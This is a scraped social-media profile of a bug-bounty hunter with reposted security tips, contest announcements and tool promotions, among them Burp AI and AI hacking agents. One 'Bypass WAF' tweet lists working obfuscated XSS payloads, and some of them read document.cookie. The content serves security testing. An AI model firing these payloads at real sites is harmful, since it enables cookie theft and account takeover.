HUNTER
@OX0DAYS
Followers
492
Following
9K
Media
19
Statuses
3K
/Future/Billionaire/Hacker/Web2/Web3/Trader/Crypto/Forex/NFT/Maker/SaaS/AI/IT/Services/Provider/
San Francisco, CA
Joined July 2020
Next stop: London for Black Hat Europe! π¬π§ Curious to meet the @yeswehack team, learn more about our Bug Bounty platform, and grab some cool swag? π Come say hi on booth 621, December 10-11! π
π More info: https://t.co/AdMoMYofpF
@BlackHatEvents #BHEU
yeswehack.com
Connect with YesWeHack at Black Hat Europe 2025 on December 10-11 in London to discover our vulnerability management solutions and meet our experts.
0
3
25
Burp AI π€ Burp Intruder Generate and run Intruder attacks just by prompting Burp AI. It will make a quick list of payloads that you can run straight away or fine tune through Intruder.
1
24
145
If you found a package.json file in the wild, you might find some internal packages vulnerable to a dependency confusion attack π Check for it quicker using this cool new tool by JSMon: https://t.co/zjdmSzRfqy π
4
61
282
XBOW raised $117M to build AI hacking agents. Now someone just open-sourced it for FREE. Strix deploys autonomous AI agents that act like real hackers - they run your code dynamically, find vulnerabilities, and validate them through actual proof-of-concepts. Why it matters:
26
196
1K
These three extensions will definitely help and save you time during your bug hunting process: Fake Filler, Code Formatter: js, css, json
6
46
308
πWe thought the best way to celebrate our revamped SOC L1 Learning Pathβ¦ is with a GIVEAWAY for the community! Because if we level upβ¦ you should too. π How to enter: 1οΈβ£ Like this post 2οΈβ£ Follow TryHackMe 3οΈβ£ Repost/share to your socials 4οΈβ£ Tag someone who needs to start
570
753
2K
Bypass WAF . . "><?/script>"><--<img+src= "><svg/onload?=alert(document.cookie)>> --!> . "-->""/>0xr3dhunt</script><deTailS open x=">" ontoggle=(co\u006efirm)``>" . "-->""/>0xr3dhunt</script><deTailS open x=">" ontoggle=(co\u006efirm(document.cookie))``>" #infosec #bugbountytips
4
60
427
Ever heard of Frida CodeShare? π― It's a community repository featuring pre-built scripts for SSL pinning bypass, root detection, crypto hooks, and more - ready to load instantly. Learn more about Frida in our guide π #BugBounty #BugBountyTips
https://t.co/w5HT81dboK
yeswehack.com
Covering the pros and cons of emulators versus real devices, and how to configure Magisk, Burp, Frida, Medusa and other mobile hacking tools.
0
11
47
Public APIs: A collective list of free APIs GitHub: https://t.co/0yInG9obgo Video: Boss AI Automations
4
94
541
Our Halloween contest has come to an end! β° Thanks to everyone who joined the fun - and big congrats to @OX0DAYS, who just won a swag pack! Check your DMs π» We're counting on you to wear your best @yeswehack outfit for Halloween next year!
Last-minute costume idea: hacker at @YesWeHack π·οΈπ» Don't have what you need? Try your luck to win a swag pack! To enter: π Follow us π Comment your fav Halloween emojis Winners (one here, one on LinkedIn) will be announced Monday, 11AM CET. Good luck, spooky hackers! π
2
3
25
Last-minute costume idea: hacker at @YesWeHack π·οΈπ» Don't have what you need? Try your luck to win a swag pack! To enter: π Follow us π Comment your fav Halloween emojis Winners (one here, one on LinkedIn) will be announced Monday, 11AM CET. Good luck, spooky hackers! π
256
25
282
Yeeeeah you could manually figure out a payload for DOM XSS... or you could just ask Burp AI to do it for you.
1
18
173
Found an XSS but got blocked by the CSP? https://t.co/0aA3GyIOVz has a compiled list of ways to bypass the Content-Security Policy. Check out the video below π
3
209
1K
Hi everyone! I just built a WaybackURLs extension that saves you a ton of time when gathering archive URLs. it supports main domains, wildcards, specific paths and sensitive file extensions. Give it a try and let me know your feedback! https://t.co/vezBMPFpgp
46
156
1K
i just Updated my XSS article: added some cleaner, more effective one-liners and integrated DalFox one-liners that support extra options. Check it out. https://t.co/6rXHUfzSZY
infosecwriteups.com
My simple yet powerful technique for spotting XSS vulnerabilities during bug hunting.
3
37
224
Perfect for IDOR hunts, messy APIs, and anyone buried in requests! π Find more helpful tips here: https://t.co/CU9YqETz2P
0
1
30
tell me any better XSS methodology than this π Explanation: This oneliner command starts by collecting all URLs from passive sources using gau tool, then filters them for potential XSS parameters using gf patterns. Next, httpx and grep are used to keep only URLs that return
16
114
734
Why spend time manually converting JSON to XML to test for XXE? Just ask Burp AI in Repeater: it handles the transformation and delivers the exploit. @NahamSec demonstrates this massive shortcut for finding complex, overlooked bugs. π
0
52
329